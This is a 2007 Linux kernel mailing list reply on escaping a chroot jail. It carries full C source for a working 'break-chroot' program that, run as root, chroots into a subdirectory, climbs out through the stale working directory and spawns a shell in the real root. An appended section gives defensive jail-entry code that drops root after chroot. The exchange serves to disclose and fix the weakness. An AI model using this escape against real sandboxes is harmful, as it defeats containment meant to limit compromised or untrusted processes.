From: nick@craig-wood.com (Nick Craig-Wood)
To: linux-kernel@vger.kernel.org
Cc: Al Viro
Subject: Re: sys_chroot+sys_fchdir Fix
Date: Wed, 26 Sep 2007 10:38:17 +0100
Message-Id: <20070926093818.33A8014C2BF@irishsea.home.craig-wood.com>
In-Reply-To: <97sX2-p1-3@gated-at.bofh.it>

Al Viro wrote:
> If you are within a chroot jail and capable of chroot(), you can chdir to
> its root, then chroot() to a subdirectory and you've got a cwd outside of
> your new root. After that you can chdir all the way out to the original
> root.

Here is some code I wrote a while back to demonstrate that escape method.
/*
 * Break a chroot
 *
 * Compile this with
 *
 *   gcc -static -Wall break-chroot.c -o break-chroot
 *
 * Get a root shell in the chrooted environment and run
 *
 *   ./break-chroot
 *
 * Nick Craig-Wood
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define SHELL "bin/sh"  /* no leading / */

int main(void)
{
    struct stat buf;

    if (chdir("/"))
        perror("chdir /"), exit(1);

    printf("Making escape tunnel\n");
    mkdir("/tmp", 01777);
    mkdir("/tmp/escape-tunnel", 0755);

    /* chroot() does not move the cwd, so it is now outside the new root */
    printf("Doing escape chroot leaving cwd behind\n");
    if (chroot("/tmp/escape-tunnel"))
        perror("chroot /tmp/escape-tunnel"), exit(1);

    printf("Exploit cwd being above the root and find a " SHELL " to run\n");
    do {
        printf("Going up...\n");
        if (chdir("../"))
            perror("chdir ../"), exit(1);
    } while (stat(SHELL, &buf) != 0);

    printf("Chrooting back into the root directory\n");
    if (chroot("."))
        perror("chroot ."), exit(1);

    printf("If this doesn't error you are out of chroot!\n");
    if (execl(SHELL, SHELL, (char *)NULL))
        perror("exec " SHELL), exit(1);

    printf("Something wicked happened!\n");
    return 1;
}

-- 
Nick Craig-Wood -- http://www.craig-wood.com/nick
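A defensive counterpart, added here and not part of Nick's message or the kernel discussion: a jail-entry routine that removes both things the escape above depends on, a cwd left outside the new root and the ability to call chroot() again, by doing chroot() then chdir("/") and then giving up uid 0 (and with it CAP_SYS_CHROOT). The function names, and the directory and uid/gid arguments, are this example's own assumptions.

```c
#define _GNU_SOURCE   /* declares setgroups() and chroot() */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if this process can no longer chroot(): it is not root and chroot(".")
 * is refused with EPERM.  As root we do not try, since root always can. */
int jail_sealed(void)
{
    if (geteuid() == 0)
        return 0;
    return chroot(".") == -1 && errno == EPERM;
}

/* Enter the jail rooted at dir and become uid/gid (must be called as root).
 * The escape needs a cwd left outside the new root and a second chroot();
 * chdir("/") removes the first, giving up uid 0 (and with it CAP_SYS_CHROOT)
 * removes the second.  Returns 0, or -1 with errno set. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (dir == NULL || uid == 0) {   /* staying uid 0 keeps the capability */
        errno = EINVAL;
        return -1;
    }
    if (chroot(dir) == -1 || chdir("/") == -1)
        return -1;
    if (setgroups(0, NULL) == -1)    /* supplementary groups go first */
        return -1;
    if (setgid(gid) == -1 || setuid(uid) == -1)
        return -1;
    if (setuid(0) == 0) {            /* root must not be recoverable */
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 4)
        return fprintf(stderr, "usage: %s jail-dir uid gid\n", argv[0]), 2;
    if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) == -1)
        return perror("enter_jail"), 1;
    printf("in jail; chroot() is now %s\n", jail_sealed() ? "denied" : "STILL POSSIBLE");
    return jail_sealed() ? 0 : 1;
}
```

Run as root against a prepared jail directory; the exit status reports whether a second chroot() is still possible from inside.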